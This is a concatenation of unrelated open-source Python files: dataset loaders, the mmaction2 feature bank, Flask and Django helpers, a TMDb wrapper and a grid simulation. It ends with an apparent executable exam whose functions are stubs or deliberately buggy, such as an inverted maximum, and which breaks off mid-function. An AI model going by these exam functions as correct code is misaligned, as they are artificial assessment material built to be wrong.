id\n\n path, target = self.samples[index * self.pair_size + i]\n cnt_idx = int(os.path.splitext(os.path.basename(path))[0])\n sample = self.loader(path, self.input_ch)\n if self.transform is not None:\n sample = self.transform(sample)\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n samples.append(sample)\n targets.append(target)\n cnt_idxs.append(cnt_idx)\n samples = torch.cat(samples, dim=0)\n targets = torch.tensor(targets)\n cnt_idxs = torch.tensor(cnt_idxs)\n return samples, targets, cnt_idxs\n\n def __len__(self):\n return int(len(self.samples) / 
self.pair_size)\n","repo_name":"yukistavailable/FontDiscriminator","sub_path":"dataset/custom_dataset.py","file_name":"custom_dataset.py","file_ext":"py","file_size_in_byte":9881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40976854121","text":"#!/usr/bin/env python\nfrom setuptools import setup\n\ntry:\n import pypandoc\n long_description = pypandoc.convert('README.md', 'rst')\nexcept(IOError, ImportError):\n long_description = \"\"\n\npackages = [\n \"sneakysnek\",\n \"sneakysnek.recorders\"\n]\n\nrequires = []\nextras_require = {\n \":sys_platform == 'darwin'\": [\"pyobjc-framework-Quartz\"],\n \":'linux' in sys_platform\": [\"python-xlib\"]\n}\n\nsetup(\n name='sneakysnek',\n version=\"0.1.1\",\n description=\"Dead simple cross-platform keyboard & mouse global input capture solution for Python 3.6+\",\n long_description=long_description,\n author=\"Nicholas Brochu\",\n author_email='nicholas@serpent.ai',\n packages=packages,\n include_package_data=True,\n install_requires=requires,\n extras_require=extras_require,\n entry_points={\n 'console_scripts': ['sneakysnek = sneakysnek.recorder:demo']\n },\n license='MIT',\n url='https://github.com/SerpentAI/sneakysnek',\n zip_safe=False,\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'Natural Language :: English',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.6'\n ]\n)\n","repo_name":"SerpentAI/sneakysnek","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"3"} +{"seq_id":"30514782222","text":"import io\nimport os\nimport os.path as osp\nimport warnings\n\nimport torch\nimport torch.distributed as dist\nfrom mmengine.dist import get_dist_info\n\ntry:\n import lmdb\n lmdb_imported = True\nexcept (ImportError, ModuleNotFoundError):\n lmdb_imported = False\n\n\nclass LFB:\n \"\"\"Long-Term Feature Bank (LFB). LFB is proposed in `Long-Term Feature\n Banks for Detailed Video Understanding `_\n The ROI features of videos are stored in the feature bank. The feature bank\n was generated by inferring with a lfb infer config. Formally, LFB is a Dict\n whose keys are video IDs and its values are also Dicts whose keys are\n timestamps in seconds. Example of LFB:\n\n .. code-block:: Python\n {\n '0f39OWEqJ24': {\n 901: tensor([[ 1.2760, 1.1965, ..., 0.0061, -0.0639],\n [-0.6320, 0.3794, ..., -1.2768, 0.5684],\n [ 0.2535, 1.0049, ..., 0.4906, 1.2555],\n [-0.5838, 0.8549, ..., -2.1736, 0.4162]]),\n ...\n 1705: tensor([[-1.0169, -1.1293, ..., 0.6793, -2.0540],\n [ 1.2436, -0.4555, ..., 0.2281, -0.8219],\n [ 0.2815, -0.0547, ..., -0.4199, 0.5157]]),\n ...\n },\n 'xmqSaQPzL1E': {\n ...\n },\n ...\n }\n Args:\n lfb_prefix_path (str): The storage path of lfb.\n max_num_sampled_feat (int): The max number of sampled features.\n Default: 5.\n window_size (int): Window size of sampling long term feature.\n Default: 60.\n lfb_channels (int): Number of the channels of the features stored\n in LFB. Default: 2048.\n dataset_modes (tuple[str] | str): Load LFB of datasets with different\n modes, such as training, validation, testing datasets. If you don't\n do cross validation during training, just load the training dataset\n i.e. 
setting `dataset_modes = ('train')`.\n Default: ('train', 'val').\n device (str): Where to load lfb. Choices are 'gpu', 'cpu' and 'lmdb'.\n A 1.65GB half-precision ava lfb (including training and validation)\n occupies about 2GB GPU memory. Default: 'gpu'.\n lmdb_map_size (int): Map size of lmdb. Default: 4e9.\n construct_lmdb (bool): Whether to construct lmdb. If you have\n constructed lmdb of lfb, you can set to False to skip the\n construction. Default: True.\n \"\"\"\n\n def __init__(self,\n lfb_prefix_path,\n max_num_sampled_feat=5,\n window_size=60,\n lfb_channels=2048,\n dataset_modes=('train', 'val'),\n device='gpu',\n lmdb_map_size=4e9,\n construct_lmdb=True):\n if not osp.exists(lfb_prefix_path):\n raise ValueError(\n f'lfb prefix path {lfb_prefix_path} does not exist!')\n self.lfb_prefix_path = lfb_prefix_path\n self.max_num_sampled_feat = max_num_sampled_feat\n self.window_size = window_size\n self.lfb_channels = lfb_channels\n if not isinstance(dataset_modes, tuple):\n assert isinstance(dataset_modes, str)\n dataset_modes = (dataset_modes, )\n self.dataset_modes = dataset_modes\n self.device = device\n\n rank, world_size = get_dist_info()\n # Loading LFB\n if self.device == 'gpu':\n if 'LOCAL_RANK' in os.environ:\n local_rank = int(os.environ['LOCAL_RANK'])\n else:\n gpus_per_node = torch.cuda.device_count()\n local_rank = rank % gpus_per_node\n\n self.load_lfb(f'cuda:{local_rank}')\n elif self.device == 'cpu':\n if world_size > 1:\n warnings.warn(\n 'If distributed training is used with multi-GPUs, lfb '\n 'will be loaded multiple times on RAM. In this case, '\n \"'lmdb' is recommended.\", UserWarning)\n self.load_lfb('cpu')\n elif self.device == 'lmdb':\n assert lmdb_imported, (\n 'Please install `lmdb` to load lfb on lmdb!')\n self.lmdb_map_size = lmdb_map_size\n self.construct_lmdb = construct_lmdb\n self.lfb_lmdb_path = osp.normpath(\n osp.join(self.lfb_prefix_path, 'lmdb'))\n\n if rank == 0 and self.construct_lmdb:\n print('Constructing LFB lmdb...')\n self.load_lfb_on_lmdb()\n\n # Synchronizes all processes to make sure lfb lmdb exist.\n if world_size > 1:\n dist.barrier()\n self.lmdb_env = lmdb.open(self.lfb_lmdb_path, readonly=True)\n else:\n raise ValueError(\"Device must be 'gpu', 'cpu' or 'lmdb', \",\n f'but get {self.device}.')\n\n def load_lfb(self, map_location):\n self.lfb = {}\n for dataset_mode in self.dataset_modes:\n lfb_path = osp.normpath(\n osp.join(self.lfb_prefix_path, f'lfb_{dataset_mode}.pkl'))\n print(f'Loading LFB from {lfb_path}...')\n self.lfb.update(torch.load(lfb_path, map_location=map_location))\n\n for video_id in self.lfb:\n video_features = self.lfb[video_id]\n for sec in video_features:\n if isinstance(video_features[sec], (list, tuple)):\n video_features[sec] = torch.stack(video_features[sec])\n self.lfb[video_id] = video_features\n print(f'LFB has been loaded on {map_location}.')\n\n def load_lfb_on_lmdb(self):\n lfb = {}\n for dataset_mode in self.dataset_modes:\n lfb_path = osp.normpath(\n osp.join(self.lfb_prefix_path, f'lfb_{dataset_mode}.pkl'))\n lfb.update(torch.load(lfb_path, map_location='cpu'))\n\n lmdb_env = lmdb.open(self.lfb_lmdb_path, map_size=self.lmdb_map_size)\n for key, value in lfb.items():\n txn = lmdb_env.begin(write=True)\n buff = io.BytesIO()\n torch.save(value, buff)\n buff.seek(0)\n txn.put(key.encode(), buff.read())\n txn.commit()\n buff.close()\n\n print(f'LFB lmdb has been constructed on {self.lfb_lmdb_path}!')\n\n def sample_long_term_features(self, video_id, timestamp):\n if self.device == 'lmdb':\n with 
self.lmdb_env.begin(write=False) as txn:\n buf = txn.get(video_id.encode())\n video_features = torch.load(io.BytesIO(buf))\n else:\n video_features = self.lfb[video_id]\n\n # Sample long term features.\n window_size, K = self.window_size, self.max_num_sampled_feat\n start = timestamp - (window_size // 2)\n lt_feats = torch.zeros(window_size, K, self.lfb_channels)\n\n for idx, sec in enumerate(range(start, start + window_size)):\n if sec in video_features:\n # `num_feat` is the number of roi features in this second.\n feat = video_features[sec]\n num_feat = feat.shape[0]\n\n # Sample some roi features randomly.\n random_lfb_indices = torch.randperm(num_feat)[:K]\n lt_feats[idx, :num_feat] = feat[random_lfb_indices]\n\n # [window_size * max_num_sampled_feat, lfb_channels]\n return lt_feats.reshape(-1, self.lfb_channels)\n\n def __getitem__(self, img_key):\n \"\"\"Sample long term features like `lfb['0f39OWEqJ24,0902']` where `lfb`\n is an instance of class LFB.\"\"\"\n video_id, timestamp = img_key.split(',')\n return self.sample_long_term_features(video_id, int(timestamp))\n\n def __len__(self):\n \"\"\"The number of videos whose ROI features are stored in LFB.\"\"\"\n return len(self.lfb)\n","repo_name":"open-mmlab/mmaction2","sub_path":"mmaction/models/roi_heads/shared_heads/lfb.py","file_name":"lfb.py","file_ext":"py","file_size_in_byte":7904,"program_lang":"python","lang":"en","doc_type":"code","stars":3560,"dataset":"github-code","pt":"3"} +{"seq_id":"39509362194","text":"from abc import ABC, abstractmethod\nfrom usuarios.repositorio.abstract_factory import AbstractFactory\nfrom .models import Usuario\nfrom peewee import IntegrityError, DoesNotExist\n\nclass UsuarioFactory(ABC):\n database = AbstractFactory.get_database()\n database.connect()\n\n @staticmethod\n def insert_usuario(usuario):\n try:\n new_usuario = Usuario(**usuario)\n new_usuario.save()\n return True\n except IntegrityError:\n return False\n\n @staticmethod\n def select_usuario(id_usuario):\n user = None\n try:\n user = Usuario.get(id_usuario=id_usuario).to_dict()\n except IndexError as e:\n print(e)\n except DoesNotExist as e:\n print(e)\n\n print(user)\n return user\n\n @staticmethod\n def select_all_usuarios():\n usuarios = None\n try:\n usuarios = [u.to_dict() for u in Usuario.select()]\n except DoesNotExist as e:\n print(e)\n except IndexError as e:\n print(e)\n except Exception as e:\n print(e)\n return usuarios\n\n @staticmethod\n def update_usuario(usuario):\n return None\n\n @staticmethod\n def delete_usuario(id_usuario):\n eliminated = False\n try:\n Usuario.delete_by_id(id_usuario)\n eliminated = True\n except Exception:\n pass\n return eliminated\n\n\n","repo_name":"josemhenao/pilae_usuarios","sub_path":"usuarios/repositorio/usuario_factory.py","file_name":"usuario_factory.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7228011905","text":"import pandas as pd \nimport pickle\nimport pubmed_parser as pp\nimport os\nimport json\nimport numpy as np\nimport random \n\n\ndef get_data_pmid(pmid):\n \"\"\"\n Return the parsed article dict for the given pmid, or None if it cannot be found.\n \"\"\"\n global pubmed_file\n global dicts_articles\n # get the xml file that contains the pmid \n try:\n pubmed_file_new = str(pmid2file[str(pmid)])\n except KeyError:\n return None\n \n # print('Found pmid in file:', pubmed_file_new)\n # If the pmid is in another file, open it\n if pubmed_file_new != pubmed_file:\n pubmed_file = pubmed_file_new\n print('Opening:', pubmed_file)\n dicts_articles = 
pp.parse_medline_xml(os.path.sep.join([DATA_DIR,pubmed_file]))\n \n article_dict = find_article(dicts_articles,pmid)\n\n return article_dict\n\ndef find_article(dicts_articles, pmid):\n \"\"\"\n Find the article with pmid in the list of articles\n \"\"\"\n\n for article in dicts_articles:\n if article['pmid'] == str(pmid): \n return article\n\n return None\n# with open('data/pmid2file.pickle', 'rb') as handle:\n# = pickle.load(handle)\n\ndef process_context(text,start,end,num_words=16):\n\n #The start and end are not quite exact, we try to match the word\n #around start and end\n # e.g. an offset can land mid-word: 'hloride binding and theBohr effect of human fetal erythrocytes and HbFII solutions.'\n # Heuristic: find the correct start and end\n while start > 0:\n if text[start] in \" ,.;())[]-\":\n break\n start -= 1\n\n while end < len(text) :\n if text[end] in \" ,.;()[]-\":\n break\n end += 1\n\n left_words = text[0:start].split()#['the','C02',..]\n num_left_words = int(num_words/2 ) \n if len(left_words) < num_left_words:\n num_left_words = len(left_words)\n\n left_words = ' '.join(left_words[-num_left_words:])\n\n right_words = text[end:-1].split() # ['the','C02',..]\n num_right_words = int(num_words/2)\n if len(right_words) < num_right_words:\n num_right_words = len(right_words)\n\n right_words = ' '.join(right_words[:num_right_words])\n left_words = left_words.replace('\"', '')\n right_words = right_words.replace('\"', '')\n\n # return left_words + ' ' + str(mention) + ' ' + right_words\n return left_words , right_words\n # return '' + text[start:end+1] + ''\n\ndef create_dataset():\n global cui2thing\n n = 0\n idx = 0 \n ide2line = open(os.path.sep.join([DATASET_DIR,\"id2line.json\"]), \"w\", encoding='utf8') # write mode\n ide2line.write(\"{\\n\")\n # File is huge, work in chunks \n for df in pd.read_csv('data/Bio_entities_Main.csv', iterator=True, chunksize=1000): \n # print(pd.DataFrame(df.groupby([\"PMID\"]).size().reset_index(name=\"Count\")))\n #Group list of pmids in the chunk\n list_pmids_chunk = df.PMID.unique()\n for pmid in list_pmids_chunk:\n # print(\"Processing PMID:\",pmid)\n #get abstract and title of the pmid\n article_dict = get_data_pmid(pmid)\n if article_dict is None:\n print(\"Pmid not found in files\")\n continue\n\n # print('title:', article_dict['title'])\n # print('abstract:', article_dict['abstract'])\n article_text = article_dict['title'] + article_dict['abstract']\n #Process rows\n rows = df[df.PMID == pmid]\n for index,row in rows.iterrows(): \n # print(row)\n Mention = row.Mention\n EntityID = row.EntityID \n Type = row.Type\n left_words = ''\n right_words = '' \n try:\n left_words,right_words = process_context(article_text, int(row.Start),int(row.End))\n context = left_words + ' ' + \\\n str(Mention) + ' ' + right_words\n except:\n continue\n\n if EntityID not in cui2thing:\n # index,mention(cano),definition\n defin = left_words + \" \" + str(Mention) + \" \" + right_words\n cui2thing[EntityID] = [str(idx), str(Mention), str(defin)]\n idx += 1\n\n line = str(EntityID) + '\\\\t' + str(Type) + '\\\\t' + str(Mention) + '\\\\t' + str(context)\n n += 1 \n # ###DEBUG\n # if n == 100:\n # ###DEBUG\n ide2line.write('\"{0}\": \"{1}\",\\n'.format(n,line))\n ide2line.flush()\n ###\n cui2emb = np.zeros((idx, 100))\n with open(os.path.sep.join([DATASET_DIR, 'cui2emb.pkl']), 'wb') as handle:\n pickle.dump(cui2emb, handle,\n protocol=pickle.HIGHEST_PROTOCOL)\n ide2line.seek(ide2line.tell() - 2, os.SEEK_SET)\n ide2line.write('')\n ide2line.write(\"}\\n\")\n 
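# Editorial note (comment added; not in the original repo): the seek(tell() - 2) trick here\n # relies on every entry ending in ',\n'; collecting the rows in a dict and serializing once\n # with json.dump would avoid this manual trailing-comma surgery.\n 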
ide2line.close()\n\n #Creating the test train dev partitions of the dataset\n indexs = [i for i in range(n)]\n random.shuffle(indexs)\n lim_train = int(n * 0.70)\n lim_dev = lim_train + int(n*0.20)\n\n with open(os.path.sep.join([DATASET_DIR, 'train_mentionid.pkl']), 'wb') as handle:\n train_idx = indexs[:lim_train]\n pickle.dump(train_idx, handle,\n protocol=pickle.HIGHEST_PROTOCOL)\n\n with open(os.path.sep.join([DATASET_DIR, 'dev_mentionid.pkl']), 'wb') as handle:\n dev_idx = indexs[lim_train:lim_dev]\n pickle.dump(dev_idx, handle,\n protocol=pickle.HIGHEST_PROTOCOL)\n\n with open(os.path.sep.join([DATASET_DIR, 'test_mentionid.pkl']), 'wb') as handle:\n test_idx = indexs[lim_dev:]\n pickle.dump(test_idx, handle,\n protocol=pickle.HIGHEST_PROTOCOL)\n\n return\n\n## \n# \n#\n\nDATA_DIR = 'data'\nDATASET_DIR = 'dataset'\nif not os.path.exists(DATASET_DIR):\n os.mkdir(DATASET_DIR)\nprint(\"Loading pmid to pubmed dict:\")\nhandle = open('data/pmid2file.pickle', 'rb')\npmid2file = pickle.load(handle)\n# we start with the first pubmed file\npubmed_file = 'pubmed21n0001.xml.gz'\nprint('Opening:', pubmed_file)\ndicts_articles = pp.parse_medline_xml(\n os.path.sep.join([DATA_DIR, pubmed_file]))\n#\ncui2thing = {}\n\ncreate_dataset()\n\nprint(\"Creating cui2cano cui2def cui2idx idx2cui...\")\ncui2cano_file = open(os.path.sep.join([DATASET_DIR, \"cui2cano.json\"]), \"w\", encoding='utf8') # write mode\ncui2def_file = open(os.path.sep.join([DATASET_DIR, \"cui2def.json\"]), \"w\", encoding='utf8') # write mode\ncui2idx_file = open(os.path.sep.join([DATASET_DIR, \"cui2idx.json\"]), \"w\", encoding='utf8') # write mode\nidx2cui_file = open(os.path.sep.join([DATASET_DIR, \"idx2cui.json\"]), \"w\", encoding='utf8') # write mode\n\ncui2idx_file.write(\"{\\n\")\nidx2cui_file.write(\"{\\n\")\ncui2cano_file.write(\"{\\n\")\ncui2def_file.write(\"{\\n\")\n# pprint.pprint(cui2thing)\nfor cui, value in cui2thing.items():\n cui2idx_file.write('\"{0}\": {1},\\n'.format(cui, value[0]))\n idx2cui_file.write('\"{0}\": \"{1}\",\\n'.format(value[0],cui))\n cui2cano_file.write('\"{0}\": \"{1}\",\\n'.format(cui, value[1]))\n cui2def_file.write('\"{0}\": \"{1}\",\\n'.format(cui, value[2]))\nprint(\"Finished successfully\")\n\n# Delete the last comma and add the final }; -2 because of the \n\ncui2idx_file.seek(cui2idx_file.tell() - 2, os.SEEK_SET)\ncui2idx_file.write('')\nidx2cui_file.seek(idx2cui_file.tell() - 2, os.SEEK_SET)\nidx2cui_file.write('')\n\ncui2cano_file.seek(cui2cano_file.tell() - 2, os.SEEK_SET)\ncui2cano_file.write('')\n\ncui2def_file.seek(cui2def_file.tell() - 2, os.SEEK_SET)\ncui2def_file.write('')\n\ncui2idx_file.write(\"\\n}\")\nidx2cui_file.write(\"\\n}\")\ncui2cano_file.write(\"\\n}\")\ncui2def_file.write(\"\\n}\")\n\n# print(cui2thing)\n\n\n","repo_name":"jcrangel/pubmed_data_task","sub_path":"pubmed_data_task/create_dataset.py","file_name":"create_dataset.py","file_ext":"py","file_size_in_byte":7604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26685830915","text":"#!/usr/bin/python\n\nimport sys\nimport os\nimport ConfigParser\nfrom movie import Movie\n\nverbose = False\nconfigfile = '~/.imdbtagrc'\n\ntry:\n import tmdb.tmdb as tmdb\nexcept ImportError:\n sys.stderr.write(\"You bad boy! 
    sys.stderr.write(\"See github.com/doganaydin/themoviedb\\n\")\n    sys.exit(1)\n\ntry:\n    config = ConfigParser.ConfigParser()\n    config.read(os.path.expanduser(configfile))\n    api_key = config.get('general', 'api_key')\n    tmdb.configure(api_key)\nexcept ConfigParser.NoSectionError:\n    sys.stderr.write(\"No section [general] found in config file \" + configfile +\n                     \"\\n\")\n    sys.exit(1)\nexcept ConfigParser.NoOptionError:\n    sys.stderr.write(\"No api_key property found in config file %s\\n\" % configfile)\n    sys.exit(1)\n\ndef _selftest():\n    global verbose\n    verbose = True\n    print(\"Running some tests\")\n    print(\"Getting movie \\\"Fight Club\\\" by ID\")\n    movie = api_get_movie(550)\n    print(\"Movie info from tmdb: '\" + movie.nice_title() + \"'\")\n    \n    print(\"Querying by string\")\n    results = api_search_movie(\"fight club\")\n    if len(results) == 0:\n        print(\"No results found\")\n    else:\n        print(\"Results found:\")\n        i = 0\n        for m in results:\n            print(\"Result %d: %s\" % (i, m.nice_title()))\n            i = i + 1\n\ndef api_get_movie(id):\n    tmdb_m = tmdb.Movie(id)\n    return _tmdb2movie(tmdb_m)\n\ndef api_search_movie(querystr_enc):\n    # Convert to ascii, because of a bug in urllib (can't search for unicode)\n    querystr = querystr_enc.encode('ascii', 'ignore')\n\n    r = []\n    movies = tmdb.Movies(querystr, True)  # True means only get first page results\n    for m in movies.iter_results():\n        r.append(_tmdbhash2movie(m))\n    return r\n\n# TODO marius/2012-12-29: Refactor the two 2movie functions\n\ndef _tmdb2movie(tmdb_m):\n    \"\"\"Converts a movie object of the tmdb package into our own movie class.\"\"\"\n    out_encoding = sys.stdout.encoding or \"UTF-8\"\n    \n    # TMDb has no \"index\" field\n    idx = \"\"\n\n    return Movie(\n        tmdb_m.get_original_title().encode(out_encoding, 'replace'),\n        tmdb_m.get_release_date() and tmdb_m.get_release_date()[0:4] or '',\n        idx,\n        str(tmdb_m.get_id()),\n        '',  # no \"kind\" field in tmdb\n        tmdb_m.get_vote_average() and str(tmdb_m.get_vote_average()) or ''\n    )\n\ndef _tmdbhash2movie(m):\n    \"\"\"Converts a movie hash object of the tmdb package into our own movie class.\"\"\"\n    out_encoding = sys.stdout.encoding or \"UTF-8\"\n    \n    # TMDb has no \"index\" field\n    idx = \"\"\n\n    return Movie(\n        m['original_title'].encode(out_encoding, 'replace'),\n        # Only keep first 4 digits of release date\n        m['release_date'] and m['release_date'][0:4] or '',\n        idx,\n        str(m['id']),\n        '',  # no \"kind\" field in tmdb\n        m['vote_average'] and str(m['vote_average']) or ''\n    )\n\ndef _debug(s):\n    if verbose:\n        sys.stderr.write(\"DEBUG: \" + s + \"\\n\")\n\n\nif __name__ == \"__main__\":\n    print(\"Import this module from your script.\")\n    _selftest()\n","repo_name":"infogrind/imdbtag","sub_path":"imdbtag/apis/tmdbapi.py","file_name":"tmdbapi.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"36377193368","text":"n, m = map(int, input().split())\nx, y, direction = map(int, input().split())\narray = []\nfor i in range(n):\n    array.append(list(map(int, input().split())))\n# create a map to record visited positions, initialized to 0\nd = [[0] * m for _ in range(n)]\n# mark the current position as visited\nd[x][y] = 1\n# define the directions: north, east, south, west\ndx = [-1, 0, 1, 0]\ndy = [0, 1, 0, -1]\n\n# turn left\ndef turn_left():\n    global direction\n    direction -= 1\n    if direction == -1:\n        direction = 3\n# start the simulation\ncount = 1\nturn_time = 0\nwhile True:\n    turn_left()\n    nx = x + dx[direction]\n    ny = y + dy[direction]\n    # after turning, move forward if the cell ahead is unvisited land\n
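    # keep rotating left; advance only onto land that has not been visited yet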
    if d[nx][ny] == 0 and array[nx][ny] == 0:\n        d[nx][ny] = 1\n        x = nx\n        y = ny\n        count += 1\n        turn_time = 0\n        continue\n    # after turning, the cell ahead has already been visited or is sea\n    else:\n        turn_time += 1\n    # if we could not move in any of the four directions\n    if turn_time == 4:\n        nx = x - dx[direction]\n        ny = y - dy[direction]\n        # step backwards if possible\n        if array[nx][ny] == 0:\n            x = nx\n            y = ny\n        # the back is blocked by sea\n        else:\n            break  # stop moving\n        turn_time = 0\n# print the answer\nprint(count)","repo_name":"LeeYongIn0517/CodingTest","sub_path":"implementation/게임개발.py","file_name":"게임개발.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"10941763868","text":"import bleach\nfrom flask_mail import Message\nfrom flask import current_app\n\nfrom api import mail\n\n\ndef send_to_default(data):\n\tsubject = '[Prescrisur] ' + bleach.clean(data['subject'])\n\tbody = bleach.clean(data['body'])\n\tsender = (data['sender']['name'], data['sender']['email'])\n\tmsg = Message(subject=subject, html=body, sender=sender, reply_to=data['sender']['email'], recipients=[current_app.config['DEFAULT_RECIPIENT']])\n\tmail.send(msg)\n\n\ndef send_from_default(recipient, subject, body):\n\tsender = current_app.config['MAIL_DEFAULT_SENDER']\n\tmsg = Message(subject=subject, html=body, sender=sender, recipients=[recipient])\n\tmail.send(msg)\n","repo_name":"pybuche/prescrisur","sub_path":"api/services/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"28107719183","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.cache import cache_page\nfrom django.core.urlresolvers import reverse\nfrom django.core import serializers\nfrom django.http import HttpResponse\nfrom django.views.generic import TemplateView\nfrom .models import Connexion, Membre, Categorie, Langage\nfrom .forms import ConnexionForm, MembreForm, CategorieForm, LangageForm\n\ndef connexion(request):\n    error = False\n    \n    if request.method == \"POST\":\n        form = ConnexionForm(request.POST)\n        if form.is_valid():\n            username = form.cleaned_data['username']\n            password = form.cleaned_data['password']\n            user = authenticate(username=username, password=password)\n            \n            if user:\n                login(request, user)\n            else:\n                error = True\n    else:\n        form = ConnexionForm()\n    \n    return render(request, 'osradmin/login.html', locals())\n\ndef deconnexion(request):\n    logout(request)\n    return redirect(reverse(connexion))\n\nclass NotificationView(TemplateView):\n    def get(self, request, *args, **kwargs):\n        id_user = request.GET['id']\n        user = Membre.objects.filter(id=id_user)\n        data = serializers.serialize('json', user, fields=('site_web',))\n        return HttpResponse(data, content_type='application/json')\n\n#@cache_page(60 * 15)\n@login_required\ndef userAdd(request):\n    error = False\n    \n    if request.method == \"POST\":\n        form = MembreForm(request.POST)\n        if form.is_valid():\n            username = form.cleaned_data['username']\n            first_name = form.cleaned_data['first_name']\n            last_name = form.cleaned_data['last_name']\n            email = form.cleaned_data['email']\n            site_web = form.cleaned_data['site_web']\n            facebook = form.cleaned_data['facebook']\n            twitter = form.cleaned_data['twitter']\n            instagram = form.cleaned_data['instagram']\n            linkedin = form.cleaned_data['linkedin']\n            
googleplus = form.cleaned_data['google_plus']\n            signature = form.cleaned_data['signature']\n            biographie = form.cleaned_data['biographie']\n            # generate the member's password automatically (helper provided by Django)\n            password = User.objects.make_random_password()\n            # create the user with the first three parameters\n            user = User.objects.create_user(username, email, password)\n            user.first_name, user.last_name = first_name, last_name  # then add the other fields\n            # save all of the member's information in the 'Membre' table (each model maps to a table in the database)\n            membre = Membre(user=user, site_web=site_web, facebook=facebook, twitter=twitter, instagram=instagram, linkedin=linkedin, googleplus=googleplus, signature=signature, biographie=biographie)\n            membre.save()\n            \n            error = True\n    else:\n        form = MembreForm()\n    \n    return render(request, 'osradmin/user_add.html', locals())\n\n#@cache_page(60 * 15)\n@login_required\ndef userlist(request):\n    membre = Membre.objects.order_by(\"-user_id\")\n    return render(request, 'osradmin/user_list.html', locals())\n\n#@cache_page(60 * 15)\n@login_required\ndef addCategorie(request):\n    right = False\n    if request.method == \"POST\":\n        form = CategorieForm(request.POST)\n        if form.is_valid():\n            categorie_name = form.cleaned_data['categorie']\n            categorie = Categorie(categorie=categorie_name)\n            categorie.save()\n            \n            right = True\n    else:\n        form = CategorieForm()\n    \n    return render(request, 'osradmin/categorie_add.html', locals())\n\n#@cache_page(60 * 15)\n@login_required\ndef addLangage(request):\n    right = False\n    if request.method == \"POST\":\n        form = LangageForm(request.POST)\n        if form.is_valid():\n            langage_name = form.cleaned_data['langage']\n            categorie = form.cleaned_data['categorie']\n            langage = Langage(langage=langage_name, categorie=categorie)\n            langage.save()\n            \n            right = True\n    else:\n        form = LangageForm()\n    \n    return render(request, 'osradmin/add_langage.html', locals())","repo_name":"Malal91/Osradmin","sub_path":"osradmin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"8600549266","text":"\"\"\"Question five for an executable examination.\"\"\"\n\nfrom typing import List\n\n# TODO: Answer all of the sub-questions inside of this file\n\n# TODO: Answer each sub-question and then save and commit and push your work\n# so that you can confirm through GitHub Actions whether your answer is correct or not\n\n# TODO: Please bear in mind that you are responsible for fixing any\n# defects that you introduce into these functions that cause\n# the overall program to crash and/or produce unexpected output\n\n# Question 5a. 
{{{\n\n# Instructions:\n# Implement the requested function so that it operates in the specified fashion\n\n# Function description:\n# The function compute_cube should:\n# --> Accept as input one int value called input_one\n# --> Using any appropriate approach compute and return the cube of that number\n# --> For instance, if input_one is equal to 1 then this function would return 1\n# --> For instance, if input_one is equal to 2 then this function would return 8\n\n\ndef compute_cube(input_one: int) -> int:\n \"\"\"Use any approach that can cube an input number.\"\"\"\n cube_output = 0\n return cube_output\n\n\ndef question_five_a():\n \"\"\"Run question five-a.\"\"\"\n # Do not edit this function\n space = \" \"\n question_five_output_a = str(compute_cube(1))\n question_five_output_a = question_five_output_a + space + str(compute_cube(2))\n question_five_output_a = question_five_output_a + space + str(compute_cube(3))\n return question_five_output_a\n\n\n# }}}\n\n# Question 5b. {{{\n\n# Instructions:\n# Fix the defect(s) in the following function\n\n# Function description:\n# The function get_maximum should:\n# --> Accept as input two int values called input_one and input_two\n# --> If the value in input_one is greater than or equal to input_two\n# then the function should return the value of input_one\n# --> Otherwise, it should return the value of input_two\n\n\ndef get_maximum(input_one: int, input_two: int) -> int:\n \"\"\"Return the maximum value of two input values.\"\"\"\n if input_one <= input_two:\n return input_one\n return input_two\n\n\ndef question_five_b():\n \"\"\"Run question five-b.\"\"\"\n # Do not edit this function\n space = \" \"\n question_five_output_b = str(get_maximum(12, 10))\n question_five_output_b = question_five_output_b + space + str(get_maximum(3, 9))\n question_five_output_b = question_five_output_b + space + str(get_maximum(3, 3))\n return question_five_output_b\n\n# }}}\n\n# Question 5c. 
{{{\n\n# Instructions:\n# Implement the following function so that it meets the following description\n\n# Function description:\n# The function compute_intersection should:\n# --> Accept as input two lists of integer values, that may potentially contain duplicate values\n# --> Compute the intersection of the two lists and return it as a list of integer values,\n# ensuring that the output list does not contain any duplicate values\n\n# For instance, if the function receives the inputs:\n# [12, 10] and [9, 10, 11]\n# then it would produce as output:\n# [10]\n\n# Note that in this example the use of the starting and ending brackets (i.e., [ and ])\n# designates that the integer values are contained inside of a list\n\n# Additionally, if the two input lists do not have any values in common\n# then the function should return the output value of [], to designate an empty list\n\n\ndef compute_intersection(input_one: List[int], input_two: List[int]) -> List[int]:\n    \"\"\"Compute the intersection of two lists of integers, returning a resulting list without duplicates.\"\"\"\n    intersection_list = []\n    return intersection_list\n\n\ndef question_five_c():\n    \"\"\"Run question five-c.\"\"\"\n    # Do not edit this function\n    separator = \" / \"\n    question_five_output_c = str(compute_intersection([12, 10], [9, 10, 11]))\n    question_five_output_c = question_five_output_c + separator + str(compute_intersection([1, 2, 3], [9, 10, 11]))\n    question_five_output_c = question_five_output_c + separator + str(compute_intersection([2, 2, 3], [1, 2, 3]))\n    return 